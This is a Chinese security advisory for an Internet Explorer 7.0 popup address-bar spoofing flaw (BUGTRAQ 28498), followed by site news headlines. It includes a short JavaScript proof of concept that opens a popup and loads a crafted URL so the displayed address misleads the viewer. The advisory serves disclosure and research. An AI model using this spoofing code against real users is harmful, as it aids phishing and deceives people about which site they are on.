受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微软发布的非常流行的WEB浏览器。如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
受影响系统:
  Microsoft Internet Explorer 7.0   描述:   BUGTRAQ ID: 28498   Internet Explorer是微软发布的非常流行的WEB浏览器。   如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。   <*来源:Juan Pablo Lopez Yacubian ([email protected])   链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">
function iniciar()
{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }
iniciar()
</script>

  建议:   目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   http://www.microsoft.com/windows/ie/default.asp

最新资讯
上市破发启示录:2018年互联网公司能从泡沫时代学到什么?

上市破发启示录:2018年

读史可以知兴替,为此翻出了早已落灰的旧资料,在2000年那
BAT小程序的困境,也是BAT的劣势

BAT小程序的困境,也是B

社交与支付的薄弱,是小程序面临的困境,同时也是百度与支
区块链史就是一部流氓史

区块链史就是一部流氓

比特币是《指环王》中的魔戒,不要试图挑战人性,比特币就
Siri在苹果活着、蠢着、没落着 最后的创始人也走了

Siri在苹果活着、蠢着

苹果语音助手Siri,秉持期待买进来,深受乔布斯期许,永远被
共享单车全球退烧

共享单车全球退烧

“共享单车战争结束”的flag立了快两年,如今终于有了成
爆料:抖音将分拆 阿里入股抖音 云峰入股头条

爆料:抖音将分拆 阿里

今日早间,有消息人士向长庚君爆料,今日头条将在本轮融资
最新文章
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番

CPU幽灵和熔断漏洞是

不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、M
解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

解析文件上传漏洞 从F

大部分的用户可能不要了解文件上传漏洞,下面小编就为大
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)

手把手教你如何构造Of

近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击
漏洞 自动化脚本 论漏洞和自动化脚本的区别

漏洞 自动化脚本 论漏

漏洞无处不在,它是在硬件、软件、协议的具体实现或系统
Python 爬虫修养-处理动态网页

Python 爬虫修养-处理

在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制
黑客通过Paypal可传输恶意图像

黑客通过Paypal可传输

PayPal解决了一个可被黑客用来向支付页面插入恶意图像